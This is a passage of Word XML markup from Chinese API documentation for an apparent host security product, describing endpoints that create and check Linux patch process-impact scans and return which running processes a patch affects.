            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>影响, 进程影响每天有定时执行, 所以安装主机后如果要立马知道是否补丁有进程影响, 需要先执行一次进程影响扫描, 或者等第二天定时执行后可以获得补丁是否有进程影响)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EE61FA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="179" w:name="_Toc115166164"/>
      <w:bookmarkStart w:id="180" w:name="创建linux补丁进程影响任务"/>
      <w:bookmarkEnd w:id="178"/>
      <w:r>
        <w:t>创建</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>补丁进程影响任务</w:t>
      </w:r>
      <w:bookmarkEnd w:id="179"/>
    </w:p>
    <w:p w14:paraId="7D57F59E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3276ACF4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>business_impact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD5DE8A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C71C10" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C7A09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15329E83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>business_impact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F7C900" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E6F4CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    id: "some job id"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C49E9E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9E70A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>一个账号同时只能一个任务运行，因此调用这个接口前，应该先调用4.1.6查询状态接口，如果status非Running，则可以创建任务，如果创建成功，则正常返回， 如果创建失败， 则抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B545937"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630"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="3625"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7854546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DEF3C57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DEAB9A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50E0687F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C15B883" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="03F3AFD5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5636D2F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1047A4E6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="278DBF42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03EF0732" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID，如果为null，则创建失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36AD275E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc115166165"/>
      <w:bookmarkStart w:id="182" w:name="查询linux补丁进程影响任务执行状态"/>
      <w:bookmarkEnd w:id="180"/>
      <w:r>
        <w:t>查询</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>补丁进程影响任务执行状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w14:paraId="2BCC0256" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C827821" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>business_impact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>status</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4447707E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B357D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D59DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ACC102" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>business_impact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/check/status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C754823" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D3B75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id":""//当前job的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 如果为null, 则当前没有job执行</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">   "status":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>running|success|failed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BEE20D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>情景说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F2F1F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>如果id为null，则说明此前从未有过job执行，status为Running。如果id不为null， 则id为最近一次job执行的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, status为最近这次job执行的状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1138E054"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788"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="4618"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3202A3F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E02C351" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B0BDB3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70E65A58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5024E218" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1DC4A434" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A57F346" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B1C8A0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60E871A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="505D1392" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>扫描任务ID， 如果为null， 则当前没有job执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F972868" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BDC2267" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67209624" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="682CE347" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>7)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D1812D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>running;success</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>;failed</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24F5EC02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="183" w:name="_Toc115166166"/>
      <w:bookmarkStart w:id="184" w:name="查询某个补丁的进程影响"/>
      <w:bookmarkEnd w:id="182"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>查询某个补丁的进程影响</w:t>
      </w:r>
      <w:bookmarkEnd w:id="183"/>
    </w:p>
    <w:p w14:paraId="096BD47C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C33EAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/patch/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>business_impact</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>patchId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4547BA47"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54"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1315"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3AF7EEC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BC20A4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E1274B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75140EE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D8CBB3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6684A3C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5490E791" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56108F40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54546177" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="442BFC8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="098B30F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE1D490" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/vul/patch/linux/business_impact/QT012014001323?agentId=e9ee72243b0d879c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A45C92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79803915" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "e9ee72243b0d879c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>patchId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT012014001323",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 15669,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>processName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "bash",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>startArgs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/bin/bash -l",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "pkg": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Ver": "5.2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Name": "libreadline5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "Release": "147.17.30"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "ports": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "e9ee72243b0d879c",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
